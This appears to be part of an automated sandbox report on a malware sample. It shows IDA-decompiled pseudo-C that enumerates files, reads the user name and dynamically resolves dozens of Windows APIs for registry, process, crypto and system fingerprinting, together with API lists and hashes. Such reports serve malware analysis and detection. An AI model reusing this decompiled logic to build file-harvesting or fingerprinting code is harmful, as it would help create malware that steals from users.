				intOrPtr _v668;
				char _v672;
				char _v676;
				intOrPtr _v680;
				char _v684;
				char _v688;
				char _v692;
				char _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				char _v708;
				void* _t142;
				long _t152;
				intOrPtr* _t155;
				intOrPtr* _t159;
				intOrPtr* _t178;
				intOrPtr* _t184;
				void* _t202;
				intOrPtr* _t206;
				intOrPtr* _t209;
				intOrPtr* _t213;
				void* _t215;
				intOrPtr* _t232;
				void* _t234;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t267;
				intOrPtr* _t270;
				void* _t283;
				intOrPtr _t285;
				intOrPtr _t311;
				intOrPtr _t314;
				intOrPtr _t316;
				intOrPtr _t317;
				void* _t344;
				void* _t346;
				signed int _t348;
				intOrPtr _t350;
				intOrPtr _t351;
				intOrPtr _t352;
				void* _t353;

				_t347 = __esi;
				_t342 = __edi;
				_t281 = __ebx;
				_t350 = _t351;
				_t285 = 0x57;
				do {
					_push(0);
					_push(0);
					_t285 = _t285 - 1;
				} while (_t285 != 0);
				_push(_t285);
				_t1 =  &_v8;
				 *_t1 = _t285;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 =  *_t1;
				_v8 = __edx;
				E004040F4( &_v8);
				E00403980(_v12);
				E00403980(_a8);
				_push(_t350);
				_push(0x4091dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t351;
				_push(0);
				E004047A8();
				_t352 = _t351 + 4;
				_v29 = 1;
				E00403DB8( &_v664, L"\\*.*", _v8, 0);
				_t142 = FindFirstFileW(E00403D3C(_v664),  &_v660); // executed
				_v28 = _t142;
				do {
					_push(_v8);
					E00403D10( &_v672, 0x104,  &(_v660.cFileName));
					_push(_v672);
					_push(E00409204);
					E0040813C(0x18,  &_v676);
					_push(_v676);
					E00403E1C();
					_t152 = GetFileAttributesW(E00403D3C(_v668)); // executed
					if(_t152 == 0xffffffff) {
						goto L19;
					} else {
						_push(_v8);
						E00403D10( &_v684, 0x104,  &(_v660.cFileName));
						_push(_v684);
						_push(E00409204);
						E0040813C(0x18,  &_v688);
						_push(_v688);
						E00403E1C();
						E00408A44(_v680, _t281,  &_v36, _t347);
						if(_v29 != 0) {
							_t281 = E004045EC(_v36) - 1;
							if(_t281 < 0) {
								goto L19;
							} else {
								_t283 = _t281 + 1;
								_t348 = 0;
								while(1) {
									E0040377C( &_v692, _v8);
									_push( &_v692);
									E00403760( &_v696, 0x104,  &(_v660.cFileName));
									_pop(_t202);
									E00403798(_t202, _v696);
									_push(E00403990(_v692));
									_t206 =  *0x41b5e0; // 0x41c7a0
									if( *((intOrPtr*)( *_t206))() != 0) {
										goto L20;
									}
									_t209 =  *0x41b5c0; // 0x41c7a4
									_v16 =  *((intOrPtr*)( *_t209))();
									if(_v16 != 0) {
										_t213 =  *0x41b640; // 0x41c7a8
										_t215 =  *((intOrPtr*)( *_t213))(_v16, 1, 0);
										_t352 = _t352 + 0xc;
										if(_t215 == 0) {
											E00404F00();
											E00404F00();
											E00406984( *((intOrPtr*)(_v36 + 4 + (_t348 + _t348 * 2) * 4)), _t283,  &_v44, _t342, _t348);
											_v56 = 0;
											_v52 = E004039E8( &_v44);
											_v48 = E00403790(_v44);
											E004034E4( &_v20);
											_t232 =  *0x41b61c; // 0x41c7ac
											_t234 =  *((intOrPtr*)( *_t232))( &_v56,  &_v68, 0);
											_t353 = _t352 + 0xc;
											if(_t234 == 0) {
												_t342 = _v60 - 1;
												if(_t342 >= 0) {
													_t346 = _t342 + 1;
													_v40 = 0;
													do {
														E004036CC();
														E00403798( &_v20, _v700);
														_v40 = _v40 + 1;
														_t346 = _t346 - 1;
													} while (_t346 != 0);
												}
											}
											E004034E4( &_v44);
											E00404F00();
											E00404F00();
											E00406984( *((intOrPtr*)(_v36 + 8 + (_t348 + _t348 * 2) * 4)), _t283,  &_v44, _t342, _t348);
											_v56 = 0;
											_v52 = E004039E8( &_v44);
											_v48 = E00403790(_v44);
											E004034E4( &_v24);
											_t253 =  *0x41b61c; // 0x41c7ac
											_t255 =  *((intOrPtr*)( *_t253))( &_v56,  &_v68, 0);
											_t352 = _t353 + 0xc;
											if(_t255 == 0) {
												_t342 = _v60 - 1;
												if(_t342 >= 0) {
													_t344 = _t342 + 1;
													_v40 = 0;
													do {
														E004036CC();
														E00403798( &_v24, _v704);
														_v40 = _v40 + 1;
														_t344 = _t344 - 1;
													} while (_t344 != 0);
												}
											}
											E004034E4( &_v44);
											E00403760( &_v708, 0x104,  &(_v660.cFileName));
											E00405210(_a8, _t283,  *((intOrPtr*)(_v36 + (_t348 + _t348 * 2) * 4)), _v12, _t342, _t348, _v708, _v24, _v20);
											_t267 =  *0x41b668; // 0x41c7b4
											 *((intOrPtr*)( *_t267))(_v16);
											_t270 =  *0x41b5d8; // 0x41c7b0
											 *((intOrPtr*)( *_t270))();
											_t348 = _t348 + 1;
											_t283 = _t283 - 1;
											if(_t283 != 0) {
												continue;
											} else {
												goto L19;
											}
										}
									}
									goto L20;
								}
							}
						}
					}
					break;
					L19:
					_push( &_v660);
					_push(_v28);
					_t155 =  *0x41b570; // 0x41c6bc
				} while ( *((intOrPtr*)( *_t155))() != 0);
				L20:
				if( &_v16 != 0 && _v16 != 0) {
					 *[fs:eax] = _t352;
					_t184 =  *0x41b668; // 0x41c7b4
					 *((intOrPtr*)( *_t184))(_v16,  *[fs:eax], 0x409135, _t350);
					_pop(_t317);
					 *[fs:eax] = _t317;
				}
				_t159 =  *0x41b5d8; // 0x41c7b0
				if( *_t159 != 0) {
					 *[fs:eax] = _t352;
					_t178 =  *0x41b5d8; // 0x41c7b0
					 *((intOrPtr*)( *_t178))( *[fs:eax], 0x40916a, _t350);
					_pop(_t316);
					 *[fs:eax] = _t316;
				}
				_pop(_t311);
				 *[fs:eax] = _t311;
				_push(E004091E4);
				E00403508( &_v708, 5);
				E00403B98( &_v688, 7);
				E004034E4( &_v44);
				_t314 =  *0x408a18; // 0x408a1c
				E004047B4( &_v36, _t314);
				E00403508( &_v24, 2);
				E004034E4( &_v12);
				E00403B80( &_v8);
				return E004034E4( &_a8);
			}






























































                                                                      0x00408d44
                                                                      0x00408d44
                                                                      0x00408d44
                                                                      0x00408d45
                                                                      0x00408d48
                                                                      0x00408d4d
                                                                      0x00408d4d
                                                                      0x00408d4f
                                                                      0x00408d51
                                                                      0x00408d51
                                                                      0x00408d54
                                                                      0x00408d55
                                                                      0x00408d55
                                                                      0x00408d58
                                                                      0x00408d59
                                                                      0x00408d5a
                                                                      0x00408d5b
                                                                      0x00408d5e
                                                                      0x00408d64
                                                                      0x00408d6c
                                                                      0x00408d74
                                                                      0x00408d7b
                                                                      0x00408d7c
                                                                      0x00408d81
                                                                      0x00408d84
                                                                      0x00408d87
                                                                      0x00408d97
                                                                      0x00408d9c
                                                                      0x00408d9f
                                                                      0x00408db8
                                                                      0x00408dd0
                                                                      0x00408dd2
                                                                      0x00408dd5
                                                                      0x00408dd5
                                                                      0x00408de9
                                                                      0x00408dee
                                                                      0x00408df4
                                                                      0x00408e04
                                                                      0x00408e09
                                                                      0x00408e1a
                                                                      0x00408e32
                                                                      0x00408e37
                                                                      0x00000000
                                                                      0x00408e3d
                                                                      0x00408e3d
                                                                      0x00408e51
                                                                      0x00408e56
                                                                      0x00408e5c
                                                                      0x00408e6c
                                                                      0x00408e71
                                                                      0x00408e82
                                                                      0x00408e90
                                                                      0x00408e99
                                                                      0x00408ea9
                                                                      0x00408eac
                                                                      0x00000000
                                                                      0x00408eb2
                                                                      0x00408eb2
                                                                      0x00408eb3
                                                                      0x00408eb5
                                                                      0x00408ebe
                                                                      0x00408ec9
                                                                      0x00408edb
                                                                      0x00408ee6
                                                                      0x00408ee7
                                                                      0x00408ef7
                                                                      0x00408ef8
                                                                      0x00408f04
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00408f0a
                                                                      0x00408f13
                                                                      0x00408f1a
                                                                      0x00408f28
                                                                      0x00408f2f
                                                                      0x00408f31
                                                                      0x00408f36
                                                                      0x00408f44
                                                                      0x00408f51
                                                                      0x00408f63
                                                                      0x00408f6a
                                                                      0x00408f75
                                                                      0x00408f80
                                                                      0x00408f86
                                                                      0x00408f95
                                                                      0x00408f9c
                                                                      0x00408f9e
                                                                      0x00408fa3
                                                                      0x00408fa8
                                                                      0x00408fab
                                                                      0x00408fad
                                                                      0x00408fae
                                                                      0x00408fb5
                                                                      0x00408fc4
                                                                      0x00408fd2
                                                                      0x00408fd7
                                                                      0x00408fda
                                                                      0x00408fda
                                                                      0x00408fb5
                                                                      0x00408fab
                                                                      0x00408fe0
                                                                      0x00408fed
                                                                      0x00408ffa
                                                                      0x0040900c
                                                                      0x00409013
                                                                      0x0040901e
                                                                      0x00409029
                                                                      0x0040902f
                                                                      0x0040903e
                                                                      0x00409045
                                                                      0x00409047
                                                                      0x0040904c
                                                                      0x00409051
                                                                      0x00409054
                                                                      0x00409056
                                                                      0x00409057
                                                                      0x0040905e
                                                                      0x0040906d
                                                                      0x0040907b
                                                                      0x00409080
                                                                      0x00409083
                                                                      0x00409083
                                                                      0x0040905e
                                                                      0x00409054
                                                                      0x00409089
                                                                      0x004090a7
                                                                      0x004090c2
                                                                      0x004090cb
                                                                      0x004090d2
                                                                      0x004090d5
                                                                      0x004090dc
                                                                      0x004090de
                                                                      0x004090df
                                                                      0x004090e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004090e0
                                                                      0x00408f36
                                                                      0x00000000
                                                                      0x00408f1a
                                                                      0x00408eb5
                                                                      0x00408eac
                                                                      0x00408e99
                                                                      0x00000000
                                                                      0x004090e6
                                                                      0x004090ec
                                                                      0x004090f0
                                                                      0x004090f1
                                                                      0x004090fa
                                                                      0x00409102
                                                                      0x00409107
                                                                      0x0040911a
                                                                      0x00409121
                                                                      0x00409128
                                                                      0x0040912d
                                                                      0x00409130
                                                                      0x00409130
                                                                      0x0040913f
                                                                      0x00409147
                                                                      0x00409154
                                                                      0x00409157
                                                                      0x0040915e
                                                                      0x00409162
                                                                      0x00409165
                                                                      0x00409165
                                                                      0x00409176
                                                                      0x00409179
                                                                      0x0040917c
                                                                      0x0040918c
                                                                      0x0040919c
                                                                      0x004091a4
                                                                      0x004091ac
                                                                      0x004091b2
                                                                      0x004091bf
                                                                      0x004091c7
                                                                      0x004091cf
                                                                      0x004091dc

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0041A69E), ref: 00408DD0
                                                                      • GetFileAttributesW.KERNEL32(00000000,?,00409204,?,0041A69E,?,?,?,?,?,?,0041A69E), ref: 00408E32
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$AttributesFindFirst
                                                                      • String ID: \*.*
                                                                      • API String ID: 4185537391-1173974218
                                                                      • Opcode ID: 1b67583be09de6412031d5871d699c3e612fc2c0ab19a09dba079c97bcff8a3f
                                                                      • Instruction ID: bd495df848275e9c4f425f21efe3e4f71b0b4aa0b50b6ea973a153adf56fcae6
                                                                      • Opcode Fuzzy Hash: 1b67583be09de6412031d5871d699c3e612fc2c0ab19a09dba079c97bcff8a3f
                                                                      • Instruction Fuzzy Hash: 18D12970A00209AFDB10EF95C885ADEB7F9EF49304F1041BAE504F72A1DB39AE45CB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004065CC Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004065CC(void* __eax) {
				short _v516;
				int _t7;
				void* _t12;
				DWORD* _t15;

				_t15 =  &_v516;
				_t12 = __eax;
				 *_t15 = 0xff;
				_t7 = GetUserNameW( &_v516, _t15); // executed
				if(_t7 == 0) {
					return E00403B80(_t12);
				}
				return E00403D10(_t12, 0x100,  &_v516);
			}







                                                                      0x004065cd
                                                                      0x004065d3
                                                                      0x004065d5
                                                                      0x004065e9
                                                                      0x004065ed
                                                                      0x00000000
                                                                      0x00406603
                                                                      0x00000000

                                                                      APIs
                                                                      • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                                                                      • Instruction ID: 82fb6e080fc5b909ee9ff94d6b2e2f71dc3c30d6621c9439b15b03eb027989ab
                                                                      • Opcode Fuzzy Hash: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                                                                      • Instruction Fuzzy Hash: 10E086712042025BD310EB58DC81A9A76D89B84315F00483EBC45D73D2EE3DDE589756
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040561C Relevance: 220.8, APIs: 63, Strings: 63, Instructions: 312libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 100%
                                                                      			E0040561C() {
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t112;
				struct HINSTANCE__* _t114;
				struct HINSTANCE__* _t116;
				struct HINSTANCE__* _t117;
				struct HINSTANCE__* _t120;
				_Unknown_base(*)()* _t121;

				 *0x41c678 = LoadLibraryA("kernel32.dll");
				 *0x41c67c = GetProcAddress( *0x41c678, "ExpandEnvironmentStringsW");
				 *0x41c680 = GetProcAddress( *0x41c678, "GetComputerNameW");
				 *0x41c684 = GetProcAddress( *0x41c678, "GlobalMemoryStatus");
				 *0x41c688 = GetProcAddress( *0x41c678, "CreateFileW");
				 *0x41c68c = GetProcAddress( *0x41c678, "GetFileSize");
				 *0x41c690 = GetProcAddress( *0x41c678, "CloseHandle");
				 *0x41c694 = GetProcAddress( *0x41c678, "ReadFile");
				 *0x41c698 = GetProcAddress( *0x41c678, "GetFileAttributesW");
				 *0x41c69c = GetProcAddress( *0x41c678, "CreateMutexA");
				 *0x41c6a0 = GetProcAddress( *0x41c678, "ReleaseMutex");
				 *0x41c6a4 = GetProcAddress( *0x41c678, "GetLastError");
				 *0x41c6a8 = GetProcAddress( *0x41c678, "GetCurrentDirectoryW");
				 *0x41c6ac = GetProcAddress( *0x41c678, "SetEnvironmentVariableW");
				 *0x41c6b0 = GetProcAddress( *0x41c678, "GetEnvironmentVariableW");
				 *0x41c6b4 = GetProcAddress( *0x41c678, "SetCurrentDirectoryW");
				 *0x41c6b8 = GetProcAddress( *0x41c678, "FindFirstFileW");
				 *0x41c6bc = GetProcAddress( *0x41c678, "FindNextFileW");
				 *0x41c6c0 = GetProcAddress( *0x41c678, "LocalFree");
				 *0x41c6c4 = GetProcAddress( *0x41c678, "GetTickCount");
				 *0x41c6c8 = GetProcAddress( *0x41c678, "CopyFileW");
				 *0x41c6cc = GetProcAddress( *0x41c678, "FindClose");
				 *0x41c6d0 = GetProcAddress( *0x41c678, "GlobalMemoryStatusEx");
				 *0x41c6d4 = GetProcAddress( *0x41c678, "CreateToolhelp32Snapshot");
				 *0x41c6d8 = GetProcAddress( *0x41c678, "Process32FirstW");
				 *0x41c6dc = GetProcAddress( *0x41c678, "Process32NextW");
				 *0x41c6e0 = GetProcAddress( *0x41c678, "GetModuleFileNameW");
				 *0x41c6e4 = GetProcAddress( *0x41c678, "SetDllDirectoryW");
				 *0x41c6e8 = GetProcAddress( *0x41c678, "GetLocaleInfoA");
				 *0x41c6ec = GetProcAddress( *0x41c678, "GetLocalTime");
				 *0x41c6f0 = GetProcAddress( *0x41c678, "GetTimeZoneInformation");
				 *0x41c6f4 = GetProcAddress( *0x41c678, "RemoveDirectoryW");
				 *0x41c6f8 = GetProcAddress( *0x41c678, "DeleteFileW");
				 *0x41c6fc = GetProcAddress( *0x41c678, "GetLogicalDriveStringsA");
				 *0x41c700 = GetProcAddress( *0x41c678, "GetDriveTypeA");
				 *0x41c704 = GetProcAddress( *0x41c678, "CreateProcessW");
				 *0x41c708 = LoadLibraryA("advapi32.dll");
				 *0x41c70c = GetProcAddress( *0x41c708, "GetUserNameW");
				 *0x41c710 = GetProcAddress( *0x41c708, "RegCreateKeyExW");
				 *0x41c714 = GetProcAddress( *0x41c708, "RegQueryValueExW");
				 *0x41c718 = GetProcAddress( *0x41c708, "RegCloseKey");
				 *0x41c71c = GetProcAddress( *0x41c708, "RegOpenKeyExW");
				 *0x41c720 = GetProcAddress( *0x41c708, "AllocateAndInitializeSid");
				 *0x41c724 = GetProcAddress( *0x41c708, "LookupAccountSidA");
				 *0x41c728 = GetProcAddress( *0x41c708, "CreateProcessAsUserW");
				 *0x41c72c = GetProcAddress( *0x41c708, "CheckTokenMembership");
				 *0x41c730 = GetProcAddress( *0x41c708, "RegOpenKeyW");
				 *0x41c734 = GetProcAddress( *0x41c708, "RegEnumKeyW");
				 *0x41c738 = GetProcAddress( *0x41c708, "RegEnumValueW");
				 *0x41c73c = GetProcAddress( *0x41c708, "CryptAcquireContextA");
				 *0x41c740 = GetProcAddress( *0x41c708, "CryptCreateHash");
				 *0x41c744 = GetProcAddress( *0x41c708, "CryptHashData");
				 *0x41c748 = GetProcAddress( *0x41c708, "CryptGetHashParam");
				 *0x41c74c = GetProcAddress( *0x41c708, "CryptDestroyHash");
				 *0x41c750 = GetProcAddress( *0x41c708, "CryptReleaseContext");
				 *0x41c754 = LoadLibraryA("user32.dll");
				_t110 =  *0x41c754; // 0x74ea0000
				 *0x41c758 = GetProcAddress(_t110, "EnumDisplayDevicesW");
				_t112 =  *0x41c754; // 0x74ea0000
				 *0x41c75c = GetProcAddress(_t112, "wvsprintfA");
				_t114 =  *0x41c754; // 0x74ea0000
				 *0x41c760 = GetProcAddress(_t114, "GetKeyboardLayoutList");
				_t116 = LoadLibraryA("shell32.dll"); // executed
				 *0x41c764 = _t116;
				_t117 =  *0x41c764; // 0x75ed0000
				 *0x41c768 = GetProcAddress(_t117, "ShellExecuteExW");
				 *0x41c76c = LoadLibraryA("ntdll.dll");
				_t120 =  *0x41c76c; // 0x779c0000
				_t121 = GetProcAddress(_t120, "RtlComputeCrc32");
				 *0x41c770 = _t121;
				return _t121;
			}










                                                                      0x00405632
                                                                      0x00405641
                                                                      0x00405653
                                                                      0x00405665
                                                                      0x00405677
                                                                      0x00405689
                                                                      0x0040569b
                                                                      0x004056ad
                                                                      0x004056bf
                                                                      0x004056d1
                                                                      0x004056e3
                                                                      0x004056f5
                                                                      0x00405707
                                                                      0x00405719
                                                                      0x0040572b
                                                                      0x0040573d
                                                                      0x0040574f
                                                                      0x00405761
                                                                      0x00405773
                                                                      0x00405785
                                                                      0x00405797
                                                                      0x004057a9
                                                                      0x004057bb
                                                                      0x004057cd
                                                                      0x004057df
                                                                      0x004057f1
                                                                      0x00405803
                                                                      0x00405815
                                                                      0x00405827
                                                                      0x00405839
                                                                      0x0040584b
                                                                      0x0040585d
                                                                      0x0040586f
                                                                      0x00405881
                                                                      0x00405893
                                                                      0x004058a5
                                                                      0x004058b4
                                                                      0x004058c3
                                                                      0x004058d5
                                                                      0x004058e7
                                                                      0x004058f9
                                                                      0x0040590b
                                                                      0x0040591d
                                                                      0x0040592f
                                                                      0x00405941
                                                                      0x00405953
                                                                      0x00405965
                                                                      0x00405977
                                                                      0x00405989
                                                                      0x0040599b
                                                                      0x004059ad
                                                                      0x004059bf
                                                                      0x004059d1
                                                                      0x004059e3
                                                                      0x004059f5
                                                                      0x00405a04
                                                                      0x00405a0e
                                                                      0x00405a19
                                                                      0x00405a23
                                                                      0x00405a2e
                                                                      0x00405a38
                                                                      0x00405a43
                                                                      0x00405a4d
                                                                      0x00405a52
                                                                      0x00405a5c
                                                                      0x00405a67
                                                                      0x00405a76
                                                                      0x00405a80
                                                                      0x00405a86
                                                                      0x00405a8b
                                                                      0x00405a92

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00419155), ref: 0040562D
                                                                      • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 0040563C
                                                                      • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040564E
                                                                      • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 00405660
                                                                      • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00405672
                                                                      • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00405684
                                                                      • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00405696
                                                                      • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056A8
                                                                      • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 004056BA
                                                                      • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 004056CC
                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 004056DE
                                                                      • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004056F0
                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 00405702
                                                                      • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405714
                                                                      • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00405726
                                                                      • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405738
                                                                      • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 0040574A
                                                                      • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 0040575C
                                                                      • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0040576E
                                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 00405780
                                                                      • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 00405792
                                                                      • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057A4
                                                                      • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057B6
                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004057C8
                                                                      • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004057DA
                                                                      • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004057EC
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 004057FE
                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00405810
                                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 00405822
                                                                      • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 00405834
                                                                      • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405846
                                                                      • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405858
                                                                      • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040586A
                                                                      • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 0040587C
                                                                      • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 0040588E
                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058A0
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058AF
                                                                      • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058BE
                                                                      • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 004058D0
                                                                      • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 004058E2
                                                                      • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 004058F4
                                                                      • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405906
                                                                      • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405918
                                                                      • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 0040592A
                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0040593C
                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040594E
                                                                      • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 00405960
                                                                      • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 00405972
                                                                      • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 00405984
                                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00405996
                                                                      • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059A8
                                                                      • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059BA
                                                                      • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004059CC
                                                                      • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004059DE
                                                                      • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004059F0
                                                                      • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 004059FF
                                                                      • GetProcAddress.KERNEL32(74EA0000,EnumDisplayDevicesW), ref: 00405A14
                                                                      • GetProcAddress.KERNEL32(74EA0000,wvsprintfA), ref: 00405A29
                                                                      • GetProcAddress.KERNEL32(74EA0000,GetKeyboardLayoutList), ref: 00405A3E
                                                                      • LoadLibraryA.KERNEL32(shell32.dll,74EA0000,GetKeyboardLayoutList,74EA0000,wvsprintfA,74EA0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A4D
                                                                      • GetProcAddress.KERNEL32(75ED0000,ShellExecuteExW), ref: 00405A62
                                                                      • LoadLibraryA.KERNEL32(ntdll.dll,75ED0000,ShellExecuteExW,shell32.dll,74EA0000,GetKeyboardLayoutList,74EA0000,wvsprintfA,74EA0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405A71
                                                                      • GetProcAddress.KERNEL32(779C0000,RtlComputeCrc32), ref: 00405A86
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$LibraryLoad
                                                                      • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                                                                      • API String ID: 2238633743-617434850
                                                                      • Opcode ID: 8a7debf825173666d64633fefa6854a254c857d9de9e6bbb9cb681206d11099e
                                                                      • Instruction ID: cfd24dbd3a5623e96a1366eeff91a6eabf16f5ed4c2f56b33555d19b2fe062a0
                                                                      • Opcode Fuzzy Hash: 8a7debf825173666d64633fefa6854a254c857d9de9e6bbb9cb681206d11099e
                                                                      • Instruction Fuzzy Hash: AEC174B1A80710ABDB01EFA5DC8AA6A37A8FB45705360953BB544FF2D1D678DC018F9C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00419108 Relevance: 57.0, APIs: 4, Strings: 28, Instructions: 964synchronizationCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
